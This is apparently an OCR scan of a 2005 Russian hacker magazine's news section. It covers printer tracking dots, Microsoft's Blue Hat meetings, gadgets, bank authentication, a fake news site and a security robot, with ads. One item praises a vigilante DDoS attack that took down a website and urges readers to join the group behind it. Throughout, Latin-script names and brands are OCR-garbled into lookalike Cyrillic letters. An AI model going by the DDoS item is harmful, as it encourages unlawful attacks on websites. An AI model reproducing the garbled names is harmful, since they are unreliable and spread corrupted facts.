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Редакция уведомляет: все ма- 
териалы в номере предостав- 
ляются как информация 
к размышлению. 

Лица, использующие данную 
информацию в противозакон- 
ных целях, могут быть привле- 
чены к ответственности. Ре- 
дакция в этих случаях ответ- 
ственности не несет. 

Редакция не несет ответствен- 
ности за содержание реклам- 
ных объявлений в номере. За 
перепечатку наших материалов 
без спроса — преследуем. 



ПСИХОЛОГИЯ — КРУТАЯ ШТУКА. Я ЕЙ СТАЛ ЗАМОРАЧИВАТЬ- 
СЯ НЕСКОЛЬКО ЛЕТ НАЗАД И ТЕПЕРЬ ОТМЕЧАЮ ДЛЯ СЕБЯ, 
ЧТО ЭТО НЕ ЗРЯ. КЛАССНО, КОГДА ТЫ ПОНИМАЕШЬ РЕАЛЬ- 
НЫЕ МОТИВЫ КАКИХ-ТО ЧЕЛОВЕЧЕСКИХ ПОСТУПКОВ. КОГДА 
ЭТО УСКОРЯЕТ ИЛИ ПРОСТО ПОМОГАЕТ РЕШАТЬ РАЗЛИЧ- 
НЫЕ ПРОБЛЕМЫ. КОГДА ПРОСТО НАЧИНАЕШЬ ПОНИМАТЬ, 
КАК ВООБЩЕ ЧТО УСТРОЕНО В ЖИЗНИ, КАК ЧТО С ЧЕМ СВЯ- 
ЗАНО И ЧТО К ЧЕМУ ПРИВОДИТ. 

КАК ЭТО ПРОСТО ПОМОГАЕТ ОБЩАТЬСЯ С ЛЮДЬМИ. КОГДА 
ТЫ ПЕРЕСТАЕШЬ ЗАЦИКЛИВАТЬСЯ НА САМОМ СЕБЕ, А ПЕРЕК- 



ЛЮЧАЕШЬСЯ НА ДРУГИХ. КОГДА НАЧИНАЕШЬ ЧУВСТВОВАТЬ 
ЛЮДЕЙ, ПОНИМАТЬ, ЧТО СКРЫВАЕТСЯ ЗА СЛОВАМИ. РЕАЛЬ- 
НЫЙ МОТИВ, А НЕ НАБОР ФРАЗ С НЕКОТОРЫМ СМЫСЛОМ. 
КОГДА ТЫ ПРОСТО ПОНИМАЕШЬ, ЧТО ТЕБЕ НУЖНО ОТ ЖИЗНИ. 
ЧЕМ ТЫ ХОЧЕШЬ ЗАНИМАТЬСЯ, КЕМ РАБОТАТЬ, ЧТО ПОКУ- 
ПАТЬ, ВО ЧТО ОДЕВАТЬСЯ. КАКУЮ КОМПАНИЮ ИМЕТЬ ВОКРУГ 
СЕБЯ. И В ДЕЙСТВИТЕЛЬНОСТИ, ЧТО НУЖНО ТЕБЕ, А НЕ КА- 
КОЙ-ТО ОБРАЗ, НАВЯЗАННЫЙ КОМПАНИЯМИ-БРЕНДАМИ, КОТО- 
РЫЕ ЗА ТЕБЯ ПРИДУМАЛИ ЦЕННОСТИ. НЕ ХОЧУ СКАЗАТЬ, ЧТО 
Я ТАКОЙ КРУТОЙ И ВЫШЕ ВСЕГО ЭТОГО. НЕТ, НО ПОНИМА- 



НИЕ ТОГО, ЧТО НА ТЕБЯ ПЫТАЮТСЯ ВЛИЯТЬ И ТЫ СПОКОЙНО 
РЕАГИРУЕШЬ НА ЭТО, ОТКЛАДЫВАЯ НЕНУЖНУЮ ИНФОРМА- 
ЦИЮ НЕ В ПОДСОЗНАНИЕ, А ОСТАВЛЯЯ ЕЕ НА СОЗНАТЕЛЬ- 
НОМ УРОВНЕ, ТЫ НАЧИНАЕШЬ ЧУВСТВОВАТЬ СЕБЯ СВОБОД- 
НЕЕ. ИМЕННО СВОБОДНЕЕ. ПОТОМУ ЧТО ПОНИМАЕШЬ, ЧТО 
МОЖЕШЬ ДЕЛАТЬ СВОЙ ВЫБОР, А НЕ ПОЛУЧЕННЫЙ ИЗВНЕ. 

И ТАК ВО ВСЕМ. ЧЕТКОЕ ПОНИМАНИЕ СЕБЯ, ЧЕГО ТЫ ХО- 
ЧЕШЬ ПОМОЖЕТ БЫСТРЕЕ ПРИБЛИЗИТСЯ К ЦЕЛИ, ОТБРАСЫ- 
ВАЯ ВСЕ НЕНУЖНОЕ. И В КОНЕЧНОМ ИТОГЕ ПОЛУЧИТЬ ТО, 
ОТЧЕГО ТЫ В ДЕЙСТВИТЕЛЬНОСТИ СТАНЕШЬ СЧАСТЛИВЫМ. 
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ХИТРЫЕ ПРИНТЕРЫ 

В детстве я мечтал стать злым и мегабогатым фальшивомонетчи- 
ком. Свой первый фальшивый доллар с изображением хрюшки 
вместо президента, купленный в детском отделе универмага, я сбыл 
старушке-селедочнице под покровом ночи. Потом даже пробовал их 
печатать на матричном гробу, но дальше этого дело не пошло. Как 
ни странно, это сошло мне с рук и очень скоро я завязал с этим 
темным делом. И слава Богу, так как для самопальных фальшиво- 
монетчиков нынче настали не лучшие времена. Оказывается, те- 
перь лазерные принтеры от ведущих производителей при каждой 
печати оставляют скрытые опознавательные коды на бумаге. Уви- 
деть желтые точки, выстроенные в определенном порядке, можно 
только под микроскопом и в ультрафиолетовом излучении. По ним 
эксперты, при необходимости, установят дату совершения копии и 
серийный номер принтера, на котором она была сделана. 

Первыми о невидимых знаках узнали крепкие парни из Еіесігопіс 
Ргопііег Роипсіаііоп — организации, защищающей права потребите- 
лей. Когда они потребовали объяснений, Секретная Служба США 
заявила, что это часть их соглашения с производителями принтеров, 
направленного на борьбу с фальшивомонетчиками. 

Несмотря на эффективность технологии, ЕРР не согласна с полити- 
кой правительства. Некоторые подпольные движения (политичес- 
кие, религиозные) нуждаются в анонимности при печати своих бро- 
шюр и плакатов (хотя, как говаривал покойный Дзержинский: 
«Зачем Вам свобода, если, конечно, Вы не враг народа?»), а Сек- 
ретная Служба тем самым вмешивается в их частную жизнь. Также, 
поскольку о внедрении опознавательных знаков в печать официаль- 
но не сообщалось, остается загадкой, к чему еще успели приложить 
руку секретные структуры. 

В общем, если ты владелец принтера от Хегох, Сапоп, Текігопіх, Вісоіі, 
І_ехтагк, Куосега, І_апіег, Копіса, МіпоІІа, НР Соіог І-азег^еІ, Ерзоп или 
ВгоІПег, будь осторожнее. Каждый раз, когда ты распечатываешь спи- 
онеренную из инета курсовую, Большой Брат следит за тобой. 




ГОЛУБЫЕ ХАКЕРЫ НА 
СЛУЖБЕ МІСПОЗОГТ 




Как известно, хакерский мир состоит из трех цветов — черный, бе- 
лый, серый. Черными шляпами называют компьютерных взломщиков, 
белыми — зесигііу-специалистов, а серыми — тех же взломщиков, но 
публикующих результаты своих исследований. Теперь к этим цветам 
добавился еще один — характерно голубой. Голубыми хакерами нын- 
че называют тех, кто стоит на службе МісгозоК и проверяет для нее 
защищенность программ (правда, цвет этот более чем спорный, как 
говорится :)). Билли, наконец, осознал, что с хакерами лучше дру- 
жить, чем воевать, и намерен каждые полгода проводить блухэто- 
вые тусовки с обсуждением актуальных дыр и способов защиты 
осей. Первая встреча сотрудников МісгозоК и известных хакеров 
состоялась еще в марте, где было наглядно продемонстрировано, 
как заманить пользователя в подставную беспроводную сеть. В 
прошлом месяце состоялась вторая встреча ВІие Наі V 2, куда приг- 
ласили таких именитых экспертов, как Бретт Мур из Зесигііу- 
Аззеззтепі.сот, Дэвид Мейнор из Іпіегпеі Зесигііу Зузіет, незави- 
симый специалист по компьютерной безопасности Дэн Камински. 
Им предложили взломать некоторые программы МісгозоК, и за этим 
процессом следили тысячи сотрудников компании, изучая поведе- 
ние хакеров. Для загрузки трояна в память участники шоу задействова- 
ли ІІЗВ-носитель, а для непосредственно взлома — систему Бігесі 
Метогу Ассезз. Ре- 
зультатами встречи 
остались довольны обе 
стороны. МісгозоК — 
потому что она полу- 
чила хороший и наг- 
лядный урок, хакеры — 
потому что компания, 
наконец, стала прис- 
лушиваться к их мне- 
нию относительно бе- 
зопасности маздайно- 
го софта. 





СІеэгагіІ 




РСЖ МЕІЧ 



ЧИСТАЯ КОЖА БЕЗ ПРОБЛЕМ! 



Г*л ь *я в брям 

?: а і|П№Г ь а И сйвР 



УНИКАЛЬНАЯ ЛИНИЯ ПО УХОДУ ЗА КОЖЕЙ 

СІ.ЕАНА8И РОВ МЕИ ( мультиэффект ) 

Бальзам после бритья Шампунь-гель для душа и умывания 3 в 1 

♦ Снимает раздражение ♦ Ухаживает за волосами 

♦ Увлажняет кожу на 24 часа ♦ Очищает и освежает кожу лица и тела 

♦ Предотвращает появление прыщей ♦ Предотвращает появление прыщей 

Гель для бритья 

♦ Обеспечивает мягкое, комфортное бритье без раздражений 

♦ Поддерживает чистоту кожи 

♦ Предотвращает появление прыщей 
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НІТЕСНЫЕѴѴ5 ▼ 



НІТЕСНЫЕѴѴ5 Ж 



ДОМ-ДИСПЛЕЙ 

В Берлине появился самый большой в мире дисплей с самым малень- 
ким разрешением. В роли дисплея выступает восьмиэтажный дом, где 
каждое окно является отдельным «пикселем», а все освещение в доме 
управляется при помощи компьютера. Осмысленное изображение полу- 
чается, если одновременно загорается определенный набор окон. Ко- 
нечно, с одной стороны, для дисплея всего 144 пикселя (18x8) — это 
откровенно мало, однако этого достаточно, чтобы прокручивать корот- 
кие сообщения и отображать простенькие динамические картинки. Од- 
нако основная задумка авторов в том, что дисплеем можно управлять с 
помощью сотового телефона. На нем можно самостоятельно нарисо- 
вать какую-нибудь картинку или даже сыграть в одну из мини-игр. Нап- 
ример, чтобы поиграть в «пинг-понг» достаточно просто загрузить себе 
на мобильник специальное приложение, позвонить на указанный номер 

и дождаться, пока к 
игре подключится еще 
один человек. Все, мож- 
но начинать играть. Уп- 
равлять движением «ра- 
кетки» можно при по- 
мощи кнопок «5» и «8», 
а проигрывает тот, кто 
первым пропустит ша- 
рик. Естественно, удо- 
вольствие не бесплат- 
ное — 1 ,24 евро за ми- 
нуту, но это явно того 
стоит. Только, к сожа- 
лению, данная акция 
продлится совсем не- 
долго — всего нес- 
колько недель. 



ОѴО ЧЕРЕЗ ФАРЫ 

Все-таки тюнинг автомобилей становится в последнее время все больше 
похожим на моддинг, особенно с развитием современных технологий. 
Так, например, фирма ЗсгеепІідПІз предложила встраивать в фары пол- 
ноценные ІХЭ-дисплеи. Причем их можно подключить к автомобильно- 
му БУБ-проигрывателю или ТѴ-тюнеру, так что теперь фильмом смо- 
жешь наслаждать не только ты, но и все окружающие. Экраны выпуска- 
ются в четырех вариантах — 3, 4, 5 и 7 дюймов и подходят для больши- 
нства иномарок. Конечно, найти практическое применение подобному 
дисплею довольно сложно — дополнительного света от 1_С0, считай, ни- 
какого (вот другое дело, если б это был ОІ_ЕО), а смотреть кино, сидя на 
складном стуле перед фарой, вроде как выглядит совсем глупо. Да и сто- 
ит эта игрушка далеко не дешево, даже самый маленький экранчик (3 
дюйма) обойдется в 900 баксов, а ведь их надо покупать сразу в паре, не 
делать же машину «одноглазой». Но у подобного украшательства явно 
найдутся свои покупатели... 




СВЕТЯЩИЕСЯ 
ТАПОЧКИ 

Я уверен, ты не раз сталкивался со 
следующей проблемой. Если про- 
сыпаешься посреди ночи, напри- 
мер, с непреодолимым желанием 
заглянуть на кухню и чем-нибудь 
подкрепиться, то добираться до 
места назначения приходится прак- 
тически на ощупь. Ведь, не разбудив остальных обитателей квартиры, свет- 
то не включишь. А пока преодолеешь это небольшое расстояние, успева- 
ешь, как минимум, несколько раз споткнуться, стукнуться о каждый встре- 
чающийся угол, а заодно и ненароком наступить на сонную кошку. Непри- 
ятно... но недавно одному американскому изобретателю пришла в голову 
замечательная идея. Он предложил встроить подсветку прямо в тапочки, 
причем не только предложил, но и разработал, и довел идею до серийного 
производства. В итоге изобретение выглядит следующим образом. В носо- 
вой части подошвы каждого тапочка встраивается по светодиоду, а напря- 
жение поступает от стандартной батарейки. Но этим дело не ограничивает- 
ся: в каждый из них встроен еще и сенсор освещения, который решает, 
нужна ли подсветка, или в комнате и так светло, весовой сенсор, который 
включает подсветку, только если в тапочках находятся чьи-то ноги, а также 
таймер, который после того как ты снимешь тапочки, еще некоторое время 
не гасит подсветку, чтобы ты мог при свете спокойно добраться до крова- 
ти. Наверное, такую «обувь» можно использовать и в качестве обычного 
фонарика, вот только не удобно, пожалуй, держать тапочек в руке, так что 
надо будет серьезно поработать над растяжкой. Кстати, супертапочки уже 
поступили в продажу по цене всего в 39.95 американских президентов. 



СЕНСОРНЫЙ 

МОБИЛЬНИК 




Интересный прототип сотового телефона продемонстрировала фирма 
МіІзиЬізІіі. Телефон выполнен в форм-факторе стандартной раскладушки, 
однако его основное отличие от всех остальных мобильников состоит в том, 
что на месте клавиатуры находится чувствительный экран. Причем на нем 
отображается только тот набор кнопок, который актуален в данный момент. 
Если ты собираешься позвонить, то на экране видны только цифры и управ- 
ляющие кнопки, если набираешь смс, то — только буквы нужного языка, ес- 
ли играешь в какую-нибудь игру, то — ее специфическое управление. Так как 
экран оборудован обратной отдачей, то на ощупь он практически не будет от- 
личаться от привычной клавиатуры, и можно будет спокойно набирать текст, 
даже не смотря на сенсорный экран. Дополнительно второй экран сможет ра- 
ботать в качестве продолжения основного дисплея. И последнее нововведе- 
ние — материал, из которого изготовлен корпус, слегка прозрачен, а под ним 
располагается матрица светодиодов, в результате можно будет отображать 
информацию, к примеру, о пропущенных звонках прямо на внешней поверх- 
ности телефона. Увы, никаких конкретных сведений ни о названии новинки, 
ни о предположительной дате начала продаж, пока не поступало. 
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НАВРЫЕМЗ ▼ 



у ПИШЕТ АЗІІЗ 

о 

© Вернее, конечно, не сама компания, а ее новый оптический привод, ЭВѴѴ- 
о 1 608Р25, относящийся к категории ЗирегМиШ — он работает с двухслой- 
§ ными дисками, записывая их со скоростью 8Х, 0\Ю-ВАМ — со скоростью 
х 5Х и ОѴО+ѴВѴѴ — со скоростью 16Х. В общем, работает со всеми воз- 
можными типами существующих дисков, причем быстро. Чтобы к быстро- 
те прибавились качество и надежность, в этом приводе используется нес- 
колько фирменных технологий Азиз. Например, РІехІгаЫпк предотвраща- 
ет ошибки, связанные с недозагрузкой буфера и исключает возможность 
порчи дисков. РІехІгаЗреесІ контролирует носители и устанавливает опти- 
мальные скорости записи, Система двойной динамической подвески 
ЭЭЗЗ II стабилизирует оптическую головку по вертикали и по горизонта- 
ли, за счет чего достигается более точное слежение за дорожкой, наряду 
со снижением уровня вибрации и шума, которые вызваны высокоскоро- 
стными моторами. Технология АРРМ была разработана для модификации 
неравномерного потока воздуха внутри привода, поскольку плавное расп- 
ределение давления ведет к уменьшению шума и повышению стабиль- 
ности. Привод монтируется как вертикально, так и горизонтально, а комп- 
лект ПО включает в себя утилиты от ІМего и ШеасІ. 



ДОЛОЙ ПРОВОДА! 

Новая версия стандарта беспроводной передачи данных ѴѴі-Рі уже не за 
горами. Не останавливаясь на достигнутом, то есть на версии д, этот 
убийца проводов продолжает идти вперед. Недавно компании, входя- 
щие в сообщество под названием ЕпсИасесІ ѴѴігеІезз Сопзогііит (ЕѴѴС), 
объявили о своем решении ускорить утверждение стандарта 802.1 1п, 
который будет работать на скорости до 600 Мбит\сек и включать в себя 
самые последние технологии, позволяющие использовать в беспровод- 
ных сетях новейшие мультимедийные приложения. Также из новшеств 





2.0ЫЕ 



СКЕАТІѴЕ — ЗВУЧИТ 
И ПОКАЗЫВАЕТ 



ожидается пониженное энергопотребление, улучшенная безопасность, 
использование диапазонов, не требующих разрешения, а также воз- 
можность передачи данных на большее расстояние. Когда стандарт ста- 
нет повсеместным пока непонятно. Хотя некоторые производители уже 
объявили о том, что вскоре выпустят устройства, его поддерживающие. 



Компания анонсировала 7.еп Ѵізіоп — плеер, предназначенный для 
воспроизведения музыки и просмотра фотографий и видео. Он осна- 
щен высококонтрастным ЖК-дисплеем размером 3,7 дюйма, с разре- 
шением 640x480 пикселей, способным отображать 262 тысячи цветов и 
позволяющим просматривать фотографии и видео даже при ярком сол- 
нечном свете. 7.еп имеет 30 Гбайтный жесткий диск, микрофон, кален- 
дарь, часы и будильник. С компьютером соединяется через порт 115В 
2.0. Габаритные размеры устройства составляют 124x74x20 мм, а весит 
оно всего 239 грамм. Также Сгеаііѵе представила обществу новые пор- 
тативные колонки ТгаѵеІЗоипсІ 400. Они оснащены двумя микромебра- 
нами ЫеоТіІапіит и цифровым усилителем, что в итоге обеспечивает 4 
Вт качественного звука. Вся эта конструкция имеет защиту от ударов, 
работает до 35 часов на одной батарейке типа ААА, стильно выглядит и 
обладает функциями объемного звучания. 




РНІЫР8 — ДОБАВИМ 
ТЕХНОЛОГИИ 
В ТКАНЬ 

На международной выставке бытовой электроники ІРА 2005, проходив- 
шей в Берлине, компания РГііІірз представила фотонный текстиль — 
ткань, в которую встроены световые системы, в результате чего она мо- 
жет использоваться в качестве дисплея. Кажется, что такие предметы, 
как одежда, полотенца, обивка мебели и занавески не похожи на места, 
где можно разместить сложные интерактивные системы. Но инженеры 
РНіІірз создали специальную подложку, которая полностью выполнена 
из ткани. На ней поместили пассивные матрицы компактных светодио- 
дов ВОВ. Пиксилизированные источники света с относительно больши- 
ми расстояниями между ВОВ пикселями были вмонтированы в такие 
предметы повседневного быта, как подушки, рюкзаки и коврики. Так 
как материалы, покрывающие источник света, естественным образом 
рассеивают свет, каждый пиксель кажется больше, чем есть на самом 
деле. Таким образом, светодиод остается маленьким и незаметным, а 
ткань сохраняет мягкость на вид и на ощупь. Это открывает массу воз- 
можностей: просыпаясь с хорошим настроением, ты рисуешь на своей 
майке цветочек, а с плохим — тучу. Всем все сразу ясно. 

РНШР5 
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5 В США УЖЕСТОЧАТ 
г БАНКОВСКУЮ 
І АВТОРИЗАЦИЮ 



Прошли те времена, когда для подбо- 

т ра пароля по словарю из трех слов: 
(Зоб, І_оѵе, Зех, было достаточно для 
проникновения в банковскую систе- 
му. Сейчас для авторизации исполь- 
зуется логин и автоматически сгене- 
рированный пароль. Но и этого, по 
мнению правительства США, недос- 
таточно. Участившиеся случаи элект- 
ронных грабежей, заставили искать 
новые способы защиты. В следую- 
щем году таким способом станет фи- 
зическое подтверждение своей лич- 
ности, то есть с помощью портатив- 
ных устройств. Что это будут за устройства пока не ясно: то ли специальные 
смарт-карты, то ли девайсы, использующие биометрическую технологию, а 
может, хардварный генератор паролей. Сейчас как раз идет разработка опти- 
мальной системы. Ее внедрение произойдет в конце 2006 года. Ожидается, 
что все компьютеры, на которых производятся финансовые операции, будут 
поставляться с таким устройством. Стопроцентную защиту оно, конечно, не 
даст, но взломать банковскую систему теперь станет значительно сложнее. 
Кстати, британский банк Ыоусіз ТЗВ самостоятельно решил бороться за 
свою безопасность и разработал для своих клиентов специальный брелок с 
ЖК экраном, который генерирует шестизначный код, действующий только 
30 секунд. Его нужно будет вводить вместе с обычным логином и паролем. 
Брелок находится на этапе тестирования, а сама технология уже применяет- 
ся в некоторых банках Азии, Скандинавии и Австралии. 



КИТАЙ 

ПРОТИВ ОКИНАВЫ 



Есть в рунете сайт Лапша. ру, в котором публикуются новости, по сло- 
вам авторов, эксклюзивные, взятые из независимых и проверенных ис- 
точников. Типа: «Киркоров женился на Бритни Спирс, у них родился 
рыжий негр». Как оказалось, в Японии тоже таких сайтов хватает. Один 
из них полностью копирует ѴаПоо барап, только контент дает немного 
другой. 18 октября этот сайт опубликовал новость о том, что китайская 
армия ворвалась в воздушное пространство над японским островом 
Окинава, явно чтобы не чайку попить. Источником информации якобы 
выступил корреспондент американского информационного агентства 
Куабо ІМеѵѵз. Стоит ли говорить, что ни настоящему УаИоо барап, ни ре- 
альному Куабо ІМеѵѵз эта «невинная шутка» не понравилась. Не говоря 
уже о том, что между Китаем и Японией сейчас и без того не самые теп- 
лые отношения. Дополнительную остроту ситуации добавляет тот факт, 

что на Окинаве нахо- 
дится крупная амери- 
канская военная ба- 
за, а в Пекин как раз 
пожаловал с офици- 
альным визитом ми- 
нистр обороны США 
Дональд Расмфелд. 
Попахивает третьей 
мировой. Чтобы избе- 
жать недоразумений, 
УаИоо и Куабо первым 
делом обратились к 
провайдеру, хостяще- 
му источник провока- 
ции с требованием его 
прикрыть, а вторым — 
стали готовить доку- 
менты в суд, чтобы отс- 
тоять свое доброе имя. 




ТЕРМИНАТОР 



Японская фирма с труднопроизносимым названием Ттзик разра- 
ботала уникального робота-охранника, названного Агіетіз (прямо 
как одноименный злодей-убийца из культовых рассказов Сальва- 
торе — прим. Лозовского). По задумке производителей робот дол- 
жен самостоятельно различать, кто пред ним находится — законо- 
послушный человек или преступник, и если субъект, по мнению ро- 
бота, оказывается все же недобропорядочным, то пытаться его за- 
держать, выпуская специальный газ и обстреливая шариками с 
особыми чернилами. 

Естественно, как величайшее достижение прогресса робота реши- 
ли сразу же познакомить с японским премьер-министром Дзюнъи- 
тиро Коидзуми. Но тут-то и началось самое интересное. Еще изда- 
лека завидев высокопоставленное лицо, искусственный интеллект 
сразу наметил себе цель, и как только премьер-министр оказался 
в радиусе поражения, сразу применил все известные ему приемы 
задержания. К счастью, никто не пострадал, а робота быстро отк- 
лючили. Вот только что-то мне не верится, что это была случай- 
ность, и робот просто обознался. Ведь налицо откровенная попыт- 
ка насильственного свержения власти, просто железный болван 
переоценил свои силы. А что если ему бы доверили, например, 
многоствольный пулемет? Так что не давайте роботам оружие. Ро- 
боту место на кухне! А то ждет нас печальное будущее, примерно, 
как в фильме «Терминатор». 

Наверное, не зря большинство фантастических рассказов про робо- 
тов, наделенных интеллектом и оружием, обычно заканчивается 
очень печально. Для людей, конечно ;). 








ВСЕ ТОЛЬКО 



Н|іі яфѵішроііл 
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НАВРЫЕѴѴЗ Ж 



РУССКИЕ 

ХАКЕРЫ БОРЮТСЯ 
С ТЕРРОРИЗМОМ 

В серѳдинѳ октября в Сети появился новый русский сайт реасе4реасе.сот, 
целью которого является активная борьба с терроризмом. Если спецслуж- 
бы делают это своими методами, то авторы сайта будут бороться с унич- 
тожением сетевых источников зла, таких как небезызвестный шш.каѵкаг- 
сепіег.сот и его многочисленные зеркала. Поводом для появления сайта 
«Андеграунд против терроризма» стали сообщения на Кавказ-центре о 
недавних событиях в Нальчике, в которых захватчиков называют освобо- 
дителями, а местные власти — оккупантами. По мнению андеграунда, та- 
кие сайты ведут лживую террористическую пропаганду и не имеют права 
на существование. Несмотря на то, что борцы с террором только недавно 
начали свою деятельность, им уже удалось привлечь на свою сторону не- 
мало людей, а также организовать массированную ОБоЗ-атаку на Кавказ- 
центр, в результате которой тот слег. Реасе4реасе.сот имеет свой форум, 

где можно обсудить 
эффективные способы 
антитеррористической 
борьбы, записаться в 
ряды добровольцев. Су- 
дя по всему, ребята взя- 
лись за дело серьезно, 
так что если у тебя 
есть желание попор- 
тить террористам кро- 
вушки — дуй по ссыл- 
ке и изучай тамошний 
постулат. 



ДЕНЬ ОТКАЗА 
ОТ ИНТЕРНЕТА 

Пока в Корее вводят трехчасовые лимиты на пользование Интернетом, а в 
Китае хоронят непонятно уже какого по счету выдохшегося у компьютера 
геймера, Британия начинает вводить день «риаллайфа». 21 октября сотруд- 
ники нескольких английских компаний в качестве протеста против массово- 
го компьютерного психоза решили отказаться от пользования Сетью и об- 
щаться исключительно речью. Впрочем, инициатива исходила не от них, а от 
их руководства, которое считает, что служащие совсем двинулись, разгова- 
ривая с рядом сидящими коллегами по е-мейлу и предпочитая лепить смай- 
лики вместо привычных улыбок. По результатам исследований, после дли- 
тельного сетевого общения, юзеры начинают испытывать проблемы с обще- 
нием реальным, поэтому, по мнению руководителей Зрогі ЕпдІапсІ, подобные 
«разрядки» нужно проводить регулярно, хотя бы раз в неделю. Поначалу 
офисные работники отнеслись к эксперименту с энтузиазмом, но к концу ра- 
бочего дня, не выдержав, нет-нет да заглядывали в монитор. Но Зрогі 
ЕпдІапсІ надежды не теряет и планирует из хилых, пассивных англичан, став- 
ших такими из-за компьютеров, воспитать физически здоровых людей. 




5АТА II ВХОДИТ 
В НАШИ ПК 

Два крупных производителя систем хранения данных — Махіог и 
Зеадаіе — объявили о выпуске винчестеров с интерфейсом ЗАТА II. Они 
характеризуются высокой пропускной способностью (3 Гб/с), большими 
емкостями и применением в них последних технологий. Изделия Махіог 
называются МахЫпе III и имеют скорость вращения шпинделя 7200 
НРМ, емкость до 300 Гбайт, буфер до 16 Мбайт и полноценный набор 
возможностей ЗАТА II, включая N00, постепенный запуск шпинделя, го- 
рячее подключение и восстановление асинхронного сигнала. У Зеадаіе 
такие винчестеры входят в семейство Ваггасиба 7200.9. Плотность запи- 
си на них достигает уровня 160 Гб на одной пластине, а общая емкость 
винчестеров становится равной 500 Гб. Объем буфера может равняться 
16 Гб. Помимо всего 
вышеперечисленного, 
была дополнена и ап- 
паратная часть — но- 
вая система крепле- 
ния кабелей и соеди- 
нителей, а также аэро- 
динамические шлейфы. 

В общем, есть куда те- 
перь записывать картин- 
ки и прочие жизненные 
радости. 



ЧИПСЕТ ОТ ѴІА ДЛЯ 
НЕДОРОГИХ МАТПЛАТ 



Г 1 




Компания ѴІА объявила о выпуске нового чипсета, который будет 
полностью отвечать соответствующим требованиям, предъявляемой 
будущей операционной системой ѴѴіпбоѵѵз Ѵізіа к подобным устрой- 
ствам. Он оснащен встроенным графическим ядром, работающим с 
ОігесІХ 9.0 и пиксельными шейдерами версии 2.0 и имеющим І-ЮТѴ- 
видеовыход. Если такое решение тебя не устроит, то можешь уста- 
новить внешнюю РСІ-Ехргезз плату, благо соответствующий разъем 
тут есть. Естественно, имеется и встроенное аудио на чипе ѴІА ѴіпуІ 
НЮ Аибіо. Кроме того, встроенные устройства представлены гига- 
битным сетевым контроллером и контроллером ЗАТА II РАЮ (уров- 
ни 0, 1, 0+1, 5 и ОВСЮ). Есть возможность устанавливать РАТА-дис- 
ки, а также программный модем имеется. Наличие встроенной гра- 
фики явно указывает на то, что этот чипсет будет использоваться в 
недорогих системных платах. Что ж, ждем их появления. 









А51І5 рекомендует ѴѴіпсІоѵѵз® ХР РгоТеззіопаІ 





Современное оружие для покорения мира 



Гарантия отсутствия ярких точек АЗІІ5 7.В0 

Компания АЗІІЗ, известная высочайшим качеством своей продукции, гарантирует отсутствие ярких точек на 
дисплее ноутбука ѴбОООѴа. Если в течение 30 дней со дня продажи на экране обнаружится хотя бы одна 
яркая точка, дисплей будет заменен.* 

*Для замены дисплея необходим товарный чек или другой документ, подтверждающий факт покупки. 



Ультратонкий и легкий 15-дюймовый ноутбуі 

АЗІІЗ ѴбОООѴа - это ультратонкий и легкий ноутбук с 15-дюймовой ІР5- 
матрицей с технологиями СоІІог ЗЫпе и СгізІаІІ ЗМпе. Обладая 
утонченным и элегантным дизайном, ноутбук АЗІІЗ ѴбОООѴа является 
современным символом успеха и стиля. 





І_СР 1В0 
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Всемирная гарантия 2 года 



Телефон службы технической поддержки АЗІІЗ: (095) 23-11-999 * 



Москва: Армада РС (095) 641-04-24 многоканальный, Артрон (095) 789-85-80, Аѵакопл М (095) 784-67-36, Аѵапіа РС (095) 954-54-22, Белый Ветер (095) 730-30-30, РогсеСотр (095) 
775-66-55, ЮМ (095) 729-57-10, МЕХЫЗ (095) 928-23-67, Тенфолд (095) 545-32-71, ОѴ.О\ (095) 105-07-00, ПИРИТ (095) 974-32-10, Роіагіз (095) 755-55-57, Портком (095) 101-33-64, 
Респект (095) М7 -АО-17, Сетевая Лаборатория (095) 500-03-05, ЗМЗ (095) 956-12-25; СтартМастер (095) 967-15-15, ТФК (095) 749-96-32; Умные машины (095) 780-00-41, Ф-Центр 
(095) 105-64-47, ІІЗИ (095) 775-82-02; Санкт-Петербург Эізріау (812) 103-00-18, КЕЙ (812) 331-24-77, Микробит (812) 333-44-44, Компьютерный мир (812) 333-00-33; СТР 
Компьютере (812) 542-4551; Барнаул: С-Тгасіе (3852) 38-10-00; Воронеж: РЕТ (0732) 77-93-39; Екатеринбург: Парад (3432) 51-48-22, Старттехно+ (3432) 56-85-01; Краснодар: 
Владос (8612) 62-33-73, Санрайз (8612) 640-066; Новосибирск: НЭТА (3832)16-33-11, Техносити (3832) 125-333; Ростов на Дону: Центр-Дон (8632) 698-668; Самара: Прагма 
(8462) 701-701 ; Томск: Интант (3822) 41-55-32; Тюмень: АО Зузіеплз (3452) 22-35-33; Челябинск: Японская электроника (3512) 63-74-34; Хабаровск: Апукеу (4212) 328-155 
Іпіеі, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі Сепігіпо, Іпіеі Сепігіпо Іодо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗІер, Ііапіит, апсі Репііит аге Ігасіетагкз ог гедізіегесі Ігасіетагкз оГ Іпіеі Согрогаііоп ог ііз зиЬзісІіагіез іп ІГіе Опііесі Зіаіез апсі оШег соипігіез. 
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НІТЕСНМЕѴѴЗ ▼ 



НІТЕСНЫЕѴѴЗ ▼ 



ГОНКИ РОБОТОВ- КУВАЛДА 

АВТОМОБИЛЕЙ ДЛЯ КЛАВИАТУРЫ 



Уже второй год подряд американское исследовательское агентство 
ОАВРА (Оеіепзе АсІѵапсесІ ВезеагсИ Ргоіесіз Адепсу) проводит соревно- 
вание ОгапсІ СПаІІепде, участники которого — полностью автономные 
роботы-автомобили. В задачи машин входит преодолеть без посторон- 
ней помощи 212-ти километровую трассу по пустыне Невада. При этом 
роботов специально ставят в тяжелые условия — вокруг типичное без- 
дорожье — так что врезаться, перевернуться или въехать в глубокую 
яму можно практически на каждом шагу. Пожалуй, с такой поездочкой 
справился бы даже не каждый опытный водитель. Впрочем, таковы ус- 
ловия соревнования, тем более солидный куш победителю в размере 
двух миллионов долларов все-таки может заставить команды серьезно 
поработать над искусственным интеллектом собственных детищ. Кста- 
ти, в прошлом году до финиша ни один из автомобилей так и не добрал- 
ся, максимум, на что были способны лучшие машины того года, так это 
смехотворные 5% дистанции. А вот соревнования этого года оказались 
куда более успешными, финишную черту смогли пересечь сразу четыре 
экипажа, причем взял первенство с результатом в 6 часов и 54 минуты 
робот по кличке Зіапіеу, созданный на основе джипа Ѵоікзѵѵадеп 
Тоиагед. Организаторы соревнования были очень довольны исходом, и 
без малейшего сожаления расстались с обещанной суммой, передав ее 
команде победителя из Стенфордского Университета. 
